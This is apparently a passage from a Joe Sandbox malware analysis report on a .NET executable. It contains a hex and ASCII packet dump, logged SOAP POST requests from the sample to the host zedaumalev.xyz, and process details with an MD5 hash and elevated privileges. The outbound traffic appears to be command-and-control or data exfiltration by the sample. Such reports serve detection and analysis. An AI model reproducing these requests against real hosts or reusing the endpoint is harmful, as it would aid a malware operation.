dc 2e aa c6 e0 de 9b 8f ba 73 cf 99 03 8d 04 72 5c 31 c3 30 7b 9c d0 f5 af 24 ab 80 37 41 14 34 62 3c 34 f4 da f0 55 ba cb 0a 15 4c 09 07 67 a7 fa 4e 4e 9e 66 60 99 9b 3e 95 00 e2 78 15 17 b2 b2 c5 ae 48 bd 69 90 8b 0a fd dc cc ef 4a be 6d 72 90 16 ad 1e a7 f7 c7 0d 76 82 42 f7 35 5f 54 c7 77 02 a5 ac ed 9e de bd 9c 0a f3 2b 1c 23 2e 6f 78 dc 97 ab a2 ce 5f a3 03 59 c4 37 12 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3d5Xm6+JWtKn=!@Q]p{/lg5!aZVB$ HF8{&v$[Us_C|XTY+NS"`HX4Gc(S#u;EKisfp|]$M;y,/wgh1B\q#5lfHbM2"!8I8:Ly,7,/&7H7BY f|T8E0L^.BfF'L:cAK?-: GSr&Hb}f,&3:g 6|6\0mhf$+htcdFx\cSYzalt]Of?I`:=;z] E0ov2!7fih{<_^`u(9,E#1a?wrh?g(#.^&RNF^$`j1Vo~_oHkp(X!tLI'8'IX+ PT0G]ab'Sw#.sr\10{$7A4b<4ULgNNf`>xHiJmrvB5_Tw+#.ox_Y70

Session ID: 1
Source IP: 192.168.2.3
Source Port: 49733
Destination IP: 77.246.145.4
Destination Port: 80
Process: C:\Users\user\Desktop\z01OUde5Dj.exe

Timestamp: Jun 23, 2021 15:59:45.185383081 CEST
kBytes transferred: 1341
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
Host: zedaumalev.xyz
Content-Length: 10709
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Timestamp: Jun 23, 2021 15:59:45.263923883 CEST
kBytes transferred: 1341
Direction: IN
Data:
HTTP/1.1 100 Continue

Timestamp: Jun 23, 2021 15:59:45.551058054 CEST
kBytes transferred: 1357
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Jun 2021 13:59:45 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: [gzip-compressed chunked body omitted]

Timestamp: Jun 23, 2021 15:59:45.892076015 CEST
kBytes transferred: 1424
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 23 Jun 2021 13:59:45 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=3
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: [gzip-compressed chunked body omitted]

Code Manipulations

Statistics

System Behavior

Analysis Process: z01OUde5Dj.exe PID: 2792 Parent PID: 5644

General

Start time: 15:57:37
Start date: 23/06/2021
Path: C:\Users\user\Desktop\z01OUde5Dj.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\z01OUde5Dj.exe'
Imagebase: 0x2b0000
File size: 2958360 bytes
MD5 hash: B66BA241FE7EDB6C16DDD9341F1E84D4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

File Activities

File Created

File Read

Registry Activities

Disassembly

Code Analysis

Copyright Joe Security LLC, Joe Sandbox Cloud Basic 32.0.0 Black Diamond
